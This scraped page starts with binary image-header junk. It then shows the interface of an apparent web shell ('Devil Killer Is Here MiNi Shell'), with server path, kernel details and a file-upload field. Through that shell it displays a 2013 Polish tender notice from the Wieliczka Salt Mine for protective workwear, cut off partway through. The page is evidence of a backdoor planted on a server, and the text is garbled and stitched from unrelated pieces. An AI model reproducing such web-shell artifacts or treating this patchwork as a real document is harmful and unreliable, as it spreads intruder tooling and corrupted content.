JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131011/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131011/211983-N-2013.html

<p class="kh_header"><b>Wieliczka: Dostawa odzieży i obuwia roboczego, odzieży i obuwia ochronnego</b><br>
<b>Numer ogłoszenia: 211983 - 2013; data zamieszczenia: 11.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Górnictwo-Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży i obuwia roboczego, odzieży i obuwia ochronnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert częściowych:
Część I  - dostawa ubrań ochronnych antyelektrostatycznych z taśmami odblaskowymi,
Część II  -	dostawa koszul flanelowych ochronnych,
Część III  -  dostawa kalesonów męskich ochronnych,
Część IV -  dostawa trzewików skórzanych ochronnych z podnoskiem kompozytowym  i antyprzebiciową podeszwą,
Część V  -  dostawa butów gumowych ochronnych,
Część VI  -  dostawa bluz watowanych ochronnych,
Część VII  -   dostawa ubrań watowanych ochronnych,
Część VIII -  dostawa rękawic ochronnych 5-palcowych, drelichowych, wzmocnionych skórą,
Część IX  -  dostawa skarpet przemysłowych,
Część X   -  dostawa odzieży i obuwia roboczego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część I   - dostawa ubrań ochronnych antyelektrostatycznych z taśmami odblaskowymi
Wadium w wysokości: 3 000,00 zł należy wnieść przed upływem terminu składania ofert .
Część  II - dostawa koszul flanelowych ochronnych
Wadium w wysokości: 700,00 zł należy wnieść przed upływem terminu składania ofert.
Część  III - dostawa kalesonów męskich ochronnych
Wadium w wysokości: 200,00 zł należy wnieść przed upływem terminu składania ofert.
Część IV  - dostawa trzewików skórzanych ochronnych z podnoskiem kompozytowym  i antyprzebiciową podeszwą
Wadium w wysokości: 1 500,00 zł należy wnieść przed upływem terminu składania ofert.
Część V   - dostawa butów gumowych ochronnych
Wadium w wysokości: 200,00 zł należy wnieść przed upływem terminu składania ofert.
Część VI  -  dostawa bluz watowanych ochronnych
Wadium w wysokości: 150,00 zł należy wnieść przed upływem terminu składania ofert.
Część VII   -  dostawa ubrań watowanych ochronnych
Wadium w wysokości: 100,00 zł należy wnieść przed upływem terminu składania ofert.
Część VIII  -  dostawa rękawic ochronnych 5-palcowych, drelichowych, wzmocnionych skórą
Wadium w wysokości: 200,00 zł należy wnieść przed upływem terminu składania ofert.
Część IX  -  dostawa skarpet przemysłowych
Wadium w wysokości: 100,00 zł należy wnieść przed upływem terminu składania ofert.
Część X  -    dostawa odzieży i obuwia roboczego
Wadium w wysokości: 200,00 zł należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (dotyczy Wykonawców składających oferty na którąkolwiek z części zamówienia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (dotyczy Wykonawców składających oferty na którąkolwiek z części zamówienia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (dotyczy Wykonawców składających oferty na którąkolwiek z części zamówienia)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (dotyczy Wykonawców składających oferty na którąkolwiek z części zamówienia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie (dotyczy Wykonawców składających oferty na którąkolwiek z części zamówienia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Warunki, które musi spełniać przedmiot zamówienia:
1) zapewnienie bezpiecznego stosowania środków ochrony indywidualnej w atmosferze zagrożonej wybuchem (dotyczy Wykonawców składających oferty na I, II, III, IV,  V, VI, VII, VIII, IX część zamówienia),
2) udokumentowanie spełniania przez odzież i obuwie robocze oraz środki ochrony indywidualnej, wymagań prawa polskiego i Unii Europejskiej (dotyczy Wykonawców składających oferty na którąkolwiek z części zamówienia).
2. W celu potwierdzenia wymagań określonych powyżej, do oferty należy dołączyć następujące dokumenty:
1) deklarację zgodności WE w rozumieniu przepisów ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (jednolity tekst: Dz. U. z 2010 Nr 138 poz. 935 ze zm.) (dotyczy Wykonawców składających oferty na X część zamówienia),
2) deklarację zgodności WE w rozumieniu przepisów ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (jednolity tekst: Dz. U. z 2010 Nr 138 poz. 935 ze zm.) oraz przepisów rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej (Dz. U. z 2005 r. Nr 259, poz. 2173), (dotyczy Wykonawców składających oferty na I,II, III, IV, V, VI, VII, VIII, IX część zamówienia),
3) certyfikat oceny typu WE w rozumieniu przepisów ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (jednolity tekst: Dz. U. z 2010 Nr 138 poz. 935 ze zm.) oraz rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej (Dz. U. z 2005 r. Nr 259, poz. 2173), (dotyczy Wykonawców składających oferty na I,II, III, IV, V, VI, VII, VIII, IX część zamówienia).
3. Dokumenty, o których mowa w pkt. 2.  należy złożyć w formie oryginału. Dopuszcza się także złożenie ww. dokumentów w formie kopii potwierdzonej za zgodność  z oryginałem przez Wykonawcę. Potwierdzenie kopii za zgodność z oryginałem powinno zawierać sformułowanie: Potwierdzam za zgodność z oryginałem, a także imię i nazwisko osoby dokonującej potwierdzenia oraz datę dokonania potwierdzenia. Potwierdzenia dokonuje osoba (osoby) uprawniona (uprawnione) do reprezentowania Wykonawcy, o której mowa w części XXIV pkt. 4 specyfikacji.
4. Dokument sporządzony w języku obcym jest składany wraz z tłumaczeniem na język polski.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - jakość - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie o którym mowa w pkt 2, z wyłączeniem takich zmian, których dokonanie
spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, wyłącznie w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1) przestojów i opóźnień w wykonywaniu przedmiotu umowy wynikłych z przyczyn leżących po stronie Zamawiającego,
2) działania siły wyższej,
3) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3. Zaistnienie, którejkolwiek z przyczyn, wymienionych w pkt 2 nie powoduje powstania u żadnej ze stron umowy, roszczenia o zmianę umowy. 
4. W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 2, każdej 
ze stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1) szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2) uzasadnienie dokonania zmiany umowy,
3) projekt zmiany umowy.
5. Wystąpienie, o którym mowa w pkt 4 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6. Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
7. Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
8. Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
9. Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia (dotyczy wszystkich części zamówienia).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój nr A.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 11:30, miejsce: Kopalnia Soli Wieliczka S.A., Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu - budynek A parter (dotyczy wszystkich części zamówienia)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa ubrań ochronnych antyelektrostatycznych z taśmami odblaskowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa ubrań ochronnych antyelektrostatycznych z taśmami odblaskowymi typ szwedzki, o gramaturze materiału 280-300 g/m2, antyelektrostatycznych, dopuszczonych do pracy w atmosferze zagrożonej wybuchem, zwanych dalej ubraniami ochronnymi.
2. Rodzaj i maksymalną ilość ubrań ochronnych objętych przedmiotem zamówienia określono poniżej:
Ubranie ochronne antyelektrostatyczne dopuszczone do pracy w atmosferze zagrożonej wybuchem z taśmami odblaskowymi, typ szwedzki
1) Na ubraniach ma znajdować się logo Zamawiającego w kolorze białym (nadruk trwały koloru białego) wyśrodkowane na plecach na wysokości łopatek. Logo należy wyskalować proporcjonalnie do podstawy o długości 25 cm. szer. 20 cm, zgodnie ze wzorem określonym w załączniku nr 24 do specyfikacji.
2) Ubrania winny być dostarczane w kolorze granatowym na rękawach i nogawkach obszyte po całym obwodzie taśmami odblaskowymi.
3) Gramatura materiału 280-300 g/m2
Maksymalne ilości - ubrania granatowe - 1 500 kpl, rozmiar - wzrost od 160 cm do 200 cm
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu ubrań ochronnych wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część ubrań ochronnych, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części I zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 14 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa koszul flanelowych ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa koszul flanelowych ochronnych o gramaturze materiału 180 g/m2 zwanych dalej koszulami. Wyrób ten będzie stosowany atmosferze zagrożonej wybuchem.
2. Rodzaj i maksymalna ilość koszul objętych przedmiotem zamówienia - 2 000 szt, wzrost od 160 cm do 200 cm, rozm. kołnierza od 38 cm do 50 cm
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu koszul wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część koszul, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części II zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 15 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa kalesonów męskich ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa kalesonów męskich bawełnianych ochronnych (białych) zwanych dalej kalesonami. Wyrób ten będzie stosowany w atmosferze zagrożonej wybuchem.
2. Rodzaj i maksymalna ilość kalesonów objętych przedmiotem zamówienia - 1 500 sztuk, wzrost od 160 cm do 200 cm
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu kalesonów wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część kalesonów, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części III zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 16 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa trzewików skórzanych ochronnych z podnoskiem kompozytowym  i antyprzebiciową podeszwą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa trzewików skórzanych ochronnych z podnoskiem kompozytowym, z antyprzebiciową podeszwą z elastycznego, nie zawierającego metalu materiału, antyelektrostatycznych, dopuszczonych do pracy w atmosferze zagrożonej wybuchem, zwanych dalej trzewikami.
2. Rodzaj i maksymalna ilość trzewików objętych przedmiotem zamówienia - 1 000 par, rozmiar od 38 do 49
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu trzewików wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część trzewików, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części IV zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 17 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa butów gumowych ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa butów gumowych ochronnych, 	antyelektrostatycznych, dopuszczonych do pracy w atmosferze zagrożonej wybuchem, zwanych dalej butami.
2. Rodzaj i maksymalna ilość butów objętych przedmiotem zamówienia - 200 par, rozmiar od 39 do 49
W ramach zamówienia, Zamawiający zobowiązuje się do zakupu butów  wymienionych powyżej o wartości 60% ceny całkowitej. Pozostałą część butów, o wartości 40% ceny całkowitej Zamawiający zakupi w zależności od potrzeb (prawo opcji).
Szczegółowe warunki realizacji części V zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 18 do specyfikacji, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.81.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa bluz watowanych ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa bluz watowanych ochronnych (kurtek ocieplanych) o gramaturze materiału 280-300 g/m2, antyelektrostatycznych, dopuszczonych do pracy w atmosferze zagrożonej wybuchem, zwanych dalej bluzami watowanymi.
